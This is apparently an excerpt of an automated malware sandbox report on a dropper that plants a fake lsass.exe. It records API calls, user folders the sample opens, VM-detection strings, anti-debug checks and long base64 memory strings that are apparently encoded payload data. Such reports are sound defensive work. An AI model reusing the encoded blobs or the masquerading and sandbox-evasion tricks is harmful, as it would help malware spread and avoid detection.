                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BBA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00BBA69B
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BCC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00BCC220
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BCE6A3 VirtualQuery,GetSystemInfo,0_2_00BCE6A3
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\lsass.exeThread delayed: delay time: 922337203685477
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: ComponentBrowserruntimeHostNet.exe, 00000004.00000002.1767137120.000000001B710000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_0
                                    Source: lsass.exe, 0000002B.00000002.2555484716.0000000003107000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]l50/P
                                    Source: lsass.exe, 00000025.00000002.2485467644.000000001C400000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHN
                                    Source: lsass.exe, 0000003A.00000002.2900411271.00000000134F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: eEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                                    Source: lsass.exe, 0000002B.00000002.2585233177.000000001BC04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
                                    Source: lsass.exe, 00000011.00000002.2038553810.000000001D0AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                                    Source: Qsi7IgkrWa.exe, 00000000.00000003.1656492217.0000000000942000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: lsass.exe, 00000011.00000002.2038553810.000000001D095000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: w32tm.exe, 00000034.00000002.2688362600.000001EED01F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
                                    Source: lsass.exe, 0000003A.00000002.2900411271.00000000136BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: LzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                                    Source: lsass.exe, 0000000A.00000002.1888524179.0000000000889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:t
                                    Source: Qsi7IgkrWa.exe, ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe1.4.dr, ComponentBrowserruntimeHostNet.exe.0.dr, TextInputHost.exe.4.dr, lsass.exe.4.dr, ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe.4.dr, ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe0.4.drBinary or memory string: uW7QEMUZyt
                                    Source: lsass.exe, 0000002B.00000002.2555484716.0000000003122000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: U8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAAv0CXP
                                    Source: lsass.exe, 0000000A.00000002.1898371850.000000001C423000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPB
                                    Source: lsass.exe, 0000003A.00000002.2859804094.00000000036DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA"
                                    Source: lsass.exe, 0000000A.00000002.1900219630.000000001C4FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: wscript.exe, 00000001.00000003.1722916927.0000000002702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\U,"
                                    Source: wscript.exe, 00000001.00000003.1722916927.0000000002702000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.[
                                    Source: lsass.exe, 0000003A.00000002.2859804094.00000000036E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: U8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAAv0CX
                                    Source: lsass.exe, 00000035.00000002.2757995941.000000001C800000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: lsass.exe, 0000003A.00000002.2904336941.000000001D204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
                                    Source: lsass.exe, 0000003A.00000002.2859804094.00000000036C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]l50/
                                    Source: lsass.exe, 00000011.00000002.2037800974.000000001D004000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000015.00000002.2075448280.000001D2D0469000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.2124077751.000000001C600000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 0000001B.00000002.2270948220.000000001C604000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000020.00000002.2399124843.000000001C804000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000024.00000002.2427388528.000002305EE37000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000029.00000002.2511918658.000001E7D6BB8000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002F.00000002.2604354524.000001CF79D37000.00000004.00000020.00020000.00000000.sdmp, lsass.exe, 00000030.00000002.2672239273.000000001C600000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeAPI call chain: ExitProcess graph end nodegraph_0-23922
                                    Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BCF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BCF838
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BD7DEE mov eax, dword ptr fs:[00000030h]0_2_00BD7DEE
                                    Source: C:\Users\user\Desktop\Qsi7IgkrWa.exeCode function: 0_2_00BDC030 GetProcessHeap,0_2_00BDC030
